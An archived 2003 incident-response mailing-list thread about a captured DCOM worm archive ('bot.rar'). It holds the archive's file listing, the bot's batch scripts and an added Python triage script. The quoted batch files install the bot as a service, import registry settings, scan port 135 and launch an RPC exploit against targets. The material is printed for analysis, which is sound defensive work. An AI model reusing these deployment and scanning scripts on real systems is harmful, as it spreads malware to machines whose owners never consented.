Typical warez site stuff. Looks like the warez kiddies are using the worms to create new file repositories. Did you run strings on any of the files?

Paul Schmehl (paulsat_private)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

> -----Original Message-----
> From: Andrej [mailto:lajat_private]
> Sent: Tuesday, August 19, 2003 4:22 AM
> To: incidentsat_private
> Subject: DCOM bot.rar
>
>
> I was finally able to get bot.rar...
> Here is the archive list:
>
> Archive bot.rar
>
> Name              Size  Packed Ratio  Date     Time  Attr     CRC     Meth Ver
> -----------------------------------------------------------------------------
> winole.exe      572928  566724  98% 22-07-03 18:47 .....A 6E1BA67C m3e 2.9
> wmpx.exe         43383   35139  80% 07-08-03 02:01 .....A 0A73E7CB m3e 2.9
> wx11.bat           109     109 100% 06-08-03 18:29 .....A BA641709 m0e 2.9
> wx12.bat           194     166  85% 07-08-03 03:28 .....A 66A7E567 m3e 2.9
> wx12.exe         19618   10055  51% 06-08-03 20:55 .....A 273D03A0 m3e 2.9
> logs                 0       0   0% 07-08-03 14:22 .D.... 00000000 m0  2.0
> unrar.bat          169     137  81% 06-08-03 18:22 .....A 4E276E39 m3e 2.9
> UnRAR.exe       194048   87237  44% 16-06-03 18:32 ...... B638F78C m3e 2.9
> bnc.cfg             76      75  98% 27-07-03 16:48 .....A 03CDF0A3 m3e 2.9
> Clear.exe        28672   11962  41% 16-06-03 18:32 .....A FBA086F4 m3e 2.9
> click.exe        32768    6149  18% 16-06-03 18:32 .....A EA3874C5 m3e 2.9
> CRC.EXE          24096    8231  34% 16-06-03 21:41 .....A D2158CA5 m3e 2.9
> cygwin1.dll     971080  375803  38% 17-06-03 03:06 .....A 7337F48A m3e 2.9
> deploy.bat         274     185  67% 06-08-03 18:20 .....A A3DA5EC6 m3e 2.9
> dhcpp.exe        69632   28908  41% 16-06-03 18:32 .....A 2CA5E915 m3e 2.9
> drvx.dll          2853    1215  42% 06-08-03 21:03 .....A 5956B0F0 m3e 2.9
> events.exe      134656   37316  27% 22-07-03 17:58 .....A 0EF30C5D m3e 2.9
> jesus.dll         4254    1275  29% 07-08-03 01:21 .....A BFF39F13 m3e 2.9
> LucomServer.dll    802     484  60% 06-08-03 18:00 .....A 4C649F72 m3e 2.9
> msoft.dll          206     128  62% 24-07-03 00:13 .....A 8DF17003 m3e 2.9
> nctl.exe        569344  542111  95% 26-07-03 21:12 .....A F0C7F7AA m3e 2.9
> pslist.exe       49152   21746  44% 16-06-03 21:41 .....A ED211211 m3e 2.9
> Q019204.EXE      21584   10136  46% 16-06-03 21:41 .....A 212BBC50 m3e 2.9
> reg.reg            773     432  55% 04-08-03 14:23 .....A 6FE50066 m3e 2.9
> service.exe      63488   26461  41% 01-07-03 10:40 .....A 78DBBEF8 m3e 2.9
> service.txt        176     129  73% 06-08-03 18:02 .....A E63DBB36 m3e 2.9
> SFind.exe       266752  263546  98% 07-08-03 02:04 .....A 76BB24D4 m3e 2.9
> start.dll         6153    1745  28% 07-08-03 14:22 .....A 303AF0E8 m3e 2.9
> users.dll        75017   23205  30% 07-08-03 01:22 .....A EE2F60B1 m3e 2.9
> -----------------------------------------------------------------------------
>    29          3152257 2060809  65%
>
>
> the .bat files are below:
> ::::::::::::::
> deploy.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
> mkdir "logs"
> copy bot.rar c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
> net stop WinOLE
> service.exe -r WinOLE
> service.exe service.txt
> %SYSTEMROOT%\regedit.exe -S reg.reg
> net start WinOLE
> exit
> ::::::::::::::
> unrar.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
>
> attrib -r bot.rar
> attrib -r unrar.exe
> attrib -r unrar.bat
>
> unrar.exe x bot.rar
> start deploy.bat
> EXIT
> ::::::::::::::
> wx11.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > RPC.dll
> sfind -p 135 %1 %2
> del RPC.dll
> ::::::::::::::
> wx12.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > rpcf.dll
> ping -n 1 %2 | find "Reply"
> if errorlevel 1 goto end
> wx12.exe 1 %2 %1
> wx12.exe 0 %2 %1
> :end
> del rpcf.dll
> exit
>
>
> ---------------------------------------------------------------------------
> Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
>  - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
>  - Automatically Control P2P, IM and Spam Traffic
>  - Ensure Reliable Performance of Mission Critical Applications
>  - Precisely Define and Implement Network Security and Performance Policies
> **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
> Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> ---------------------------------------------------------------------------
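Paul's question ("did you run strings") is the natural next triage step after a listing like the one quoted above; a responder would first check that the listing is internally consistent and note which binaries are worth running strings on at all. The Python below is an added example for this thread, not code from either message or from any tool named in it: it parses a `rar l`-style listing into records, recomputes the trailer totals, summarises file types and the modification-time window, flags executables that RAR could barely shrink (a PE that compresses by only a few percent is usually already compressed or packed, so a plain strings run shows little until it is unpacked), and implements a minimal strings() for ASCII and UTF-16LE runs. The record lines are transcribed from Andrej's listing; `SAMPLE_BLOB` is a constructed byte string, not the content of any file in the archive, and all function names are this example's own.

```python
"""Triage helpers for a `rar l`-style listing plus a minimal strings(); added example."""
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

# Records transcribed from Andrej's post, one per line (the mailer had wrapped them).
LISTING = """\
winole.exe 572928 566724 98% 22-07-03 18:47 .....A 6E1BA67C m3e 2.9
wmpx.exe 43383 35139 80% 07-08-03 02:01 .....A 0A73E7CB m3e 2.9
wx11.bat 109 109 100% 06-08-03 18:29 .....A BA641709 m0e 2.9
wx12.bat 194 166 85% 07-08-03 03:28 .....A 66A7E567 m3e 2.9
wx12.exe 19618 10055 51% 06-08-03 20:55 .....A 273D03A0 m3e 2.9
logs 0 0 0% 07-08-03 14:22 .D.... 00000000 m0 2.0
unrar.bat 169 137 81% 06-08-03 18:22 .....A 4E276E39 m3e 2.9
UnRAR.exe 194048 87237 44% 16-06-03 18:32 ...... B638F78C m3e 2.9
bnc.cfg 76 75 98% 27-07-03 16:48 .....A 03CDF0A3 m3e 2.9
Clear.exe 28672 11962 41% 16-06-03 18:32 .....A FBA086F4 m3e 2.9
click.exe 32768 6149 18% 16-06-03 18:32 .....A EA3874C5 m3e 2.9
CRC.EXE 24096 8231 34% 16-06-03 21:41 .....A D2158CA5 m3e 2.9
cygwin1.dll 971080 375803 38% 17-06-03 03:06 .....A 7337F48A m3e 2.9
deploy.bat 274 185 67% 06-08-03 18:20 .....A A3DA5EC6 m3e 2.9
dhcpp.exe 69632 28908 41% 16-06-03 18:32 .....A 2CA5E915 m3e 2.9
drvx.dll 2853 1215 42% 06-08-03 21:03 .....A 5956B0F0 m3e 2.9
events.exe 134656 37316 27% 22-07-03 17:58 .....A 0EF30C5D m3e 2.9
jesus.dll 4254 1275 29% 07-08-03 01:21 .....A BFF39F13 m3e 2.9
LucomServer.dll 802 484 60% 06-08-03 18:00 .....A 4C649F72 m3e 2.9
msoft.dll 206 128 62% 24-07-03 00:13 .....A 8DF17003 m3e 2.9
nctl.exe 569344 542111 95% 26-07-03 21:12 .....A F0C7F7AA m3e 2.9
pslist.exe 49152 21746 44% 16-06-03 21:41 .....A ED211211 m3e 2.9
Q019204.EXE 21584 10136 46% 16-06-03 21:41 .....A 212BBC50 m3e 2.9
reg.reg 773 432 55% 04-08-03 14:23 .....A 6FE50066 m3e 2.9
service.exe 63488 26461 41% 01-07-03 10:40 .....A 78DBBEF8 m3e 2.9
service.txt 176 129 73% 06-08-03 18:02 .....A E63DBB36 m3e 2.9
SFind.exe 266752 263546 98% 07-08-03 02:04 .....A 76BB24D4 m3e 2.9
start.dll 6153 1745 28% 07-08-03 14:22 .....A 303AF0E8 m3e 2.9
users.dll 75017 23205 30% 07-08-03 01:22 .....A EE2F60B1 m3e 2.9
"""
SUMMARY = "29 3152257 2060809 65%"   # the listing's trailer line, also from the post

RECORD = re.compile(
    r"^(?P<name>\S+)\s+(?P<size>\d+)\s+(?P<packed>\d+)\s+(?P<ratio>\d+)%\s+"
    r"(?P<date>\d\d-\d\d-\d\d)\s+(?P<time>\d\d:\d\d)\s+(?P<attr>\S{6})\s+"
    r"(?P<crc>[0-9A-F]{8})\s+m\S+\s+\d\.\d$")

@dataclass
class Entry:
    name: str
    size: int
    packed: int
    mtime: datetime      # RAR prints DD-MM-YY HH:MM
    attr: str
    crc: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.attr

    @property
    def ext(self) -> str:
        if self.is_dir or "." not in self.name:
            return "(none)"
        return self.name.rsplit(".", 1)[1].lower()

def parse_listing(text: str) -> list[Entry]:
    """Keep only lines that match a record; headers, rules and blanks are skipped."""
    out = []
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if m:
            out.append(Entry(m["name"], int(m["size"]), int(m["packed"]),
                             datetime.strptime(f"{m['date']} {m['time']}", "%d-%m-%y %H:%M"),
                             m["attr"], m["crc"]))
    return out

def totals_match(entries: list[Entry], summary: str) -> bool:
    """Recompute count, total size, total packed and ratio; compare with the trailer."""
    count, size, packed, ratio = summary.split()
    tot_size = sum(e.size for e in entries)
    tot_packed = sum(e.packed for e in entries)
    return (len(entries) == int(count) and tot_size == int(size)
            and tot_packed == int(packed) and f"{tot_packed * 100 // tot_size}%" == ratio)

def triage(entries: list[Entry]) -> dict:
    """File-type mix, mtime window, and .exe files RAR shrank by under 5% (heuristic:
    such binaries are usually already compressed or packed, so strings them after unpacking)."""
    mtimes = sorted(e.mtime for e in entries)
    return {
        "by_ext": dict(Counter(e.ext for e in entries)),
        "first": mtimes[0],
        "last": mtimes[-1],
        "barely_compressible": [e.name for e in entries
                                if e.ext == "exe" and e.size and e.packed * 100 // e.size >= 95],
    }

def strings(data: bytes, min_len: int = 4) -> list[str]:
    """Minimal `strings`: printable-ASCII runs, then UTF-16LE runs (common in Windows PEs)."""
    ascii_runs = [m.group().decode("ascii")
                  for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    wide_runs = [m.group().decode("utf-16-le")
                 for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return ascii_runs + wide_runs

# Constructed byte blob standing in for a file from the archive; not real file content.
SAMPLE_BLOB = (b"MZ\x90\x00\x03\x00\x00\x00" + b"This program cannot be run in DOS mode.\x00"
               + b"\x01\x02" + "bot.rar".encode("utf-16-le") + b"\x00\x00ab\x00")

if __name__ == "__main__":
    found = parse_listing(LISTING)
    print("trailer consistent:", totals_match(found, SUMMARY))
    print(triage(found))
    print(strings(SAMPLE_BLOB))
```

Run against the transcribed listing, the trailer checks out (29 entries, 3152257 bytes, 2060809 packed, 65%), the earliest timestamp is 16-06-03 and the latest 07-08-03 14:22, and winole.exe, nctl.exe and SFind.exe are the executables that barely compress; those three are the ones where a strings run on the raw file is least likely to be informative.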
This archive was generated by hypermail 2b30 : Tue Aug 19 2003 - 21:05:08 PDT